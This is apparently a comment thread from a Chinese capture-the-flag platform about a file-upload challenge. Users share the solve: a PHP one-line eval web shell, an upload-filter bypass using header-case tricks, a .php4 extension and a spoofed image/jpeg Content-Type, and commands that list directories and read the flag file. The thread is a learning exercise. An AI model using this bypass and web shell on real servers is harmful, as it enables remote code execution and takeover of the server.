评分(22)
解题动态
aiiiiiiibo 攻破了该题 1天前
yiri0911 攻破了该题 1天前
gfgfgf 攻破了该题 1天前
年年youyu 攻破了该题 1天前
z231288 攻破了该题 2天前
hell0-hnc 攻破了该题 3天前
MOTMlsc 攻破了该题 3天前
HuangYanQwQ 攻破了该题 4天前
微年 攻破了该题 4天前
dwx386572657 攻破了该题 4天前
15079182261 攻破了该题 5天前
MirrorJon 攻破了该题 6天前
WW12@ 攻破了该题 6天前
zxx256xxz 攻破了该题 7天前
JOJODONG 攻破了该题 7天前
MintMint 攻破了该题 9天前
公良棉 攻破了该题 11天前
lvchijing 攻破了该题 12天前
fish12139 攻破了该题 13天前
评论
公良棉 11天前
举报
接着我和评论区大部分人都发现,一句话木马蚁剑连不上或者返回为空,看了wp,发现wp在bp的Repeater完成的,而且flag直接就放在返回页了,于是我构造了一个最简单(评论区发不出来)拿flag的纯php文件,发现按之前操作更改后可以成功上传,但并没有返回flag,不过却从响应头里看到Upload Success下还有信息,是关于url地址的,以此构造完整url类似前往页面便拿到flag
公良棉 11天前
举报
说说这个题的路程,bp抓包,首先Content-Type: multipart/form-data;,这个玩意要改个字母大写(我只试过m,其他的等后来者)不然上传不了(具体原因评论区有大佬的推测),接着改 filename的后缀为php4(wp竟然笔误写成php5),最后改Content-Type:为 image/jpeg,就能上传成功。
公良棉 11天前
举报
flag{*******}
suxiansheng 1月前
举报
https://blog.csdn.net/wangsu327/article/details/161358987?spm=1011.2124.3001.6209
店晓贰 20天前
举报
关键点再header里的Content-Type
fyjfjk 1月前
举报
屎
爱喝畅汁 3月前
举报
随便一张图片,用记事本打开写入一句话木马,上传之后点击提交时抓包,抓包之后修改三处:1.Content-Type 修改为:image/jpeg 2.文件名后缀修改为:php4 3.head头修改为Multipart/form-data,放行之后图片就成功上传了,再使用蚁剑进行连接即可
是小白鸭 4月前
举报
方法分享:1.php内容:<?php eval($_REQUEST[cmd]);?>。2.绕过。3.运行php寻找flag位置,url?cmd=print_r(scandir['.']); 。4.发现flag文件,url?cmd=echo file_get_contents('../../../../flag'); 。初学者的一点小分享:)
李逍遥逛霍格沃茨 5月前
举报
能不能退金币 真被恶心到了
李逍遥逛霍格沃茨 5月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空
李逍遥逛霍格沃茨 5月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空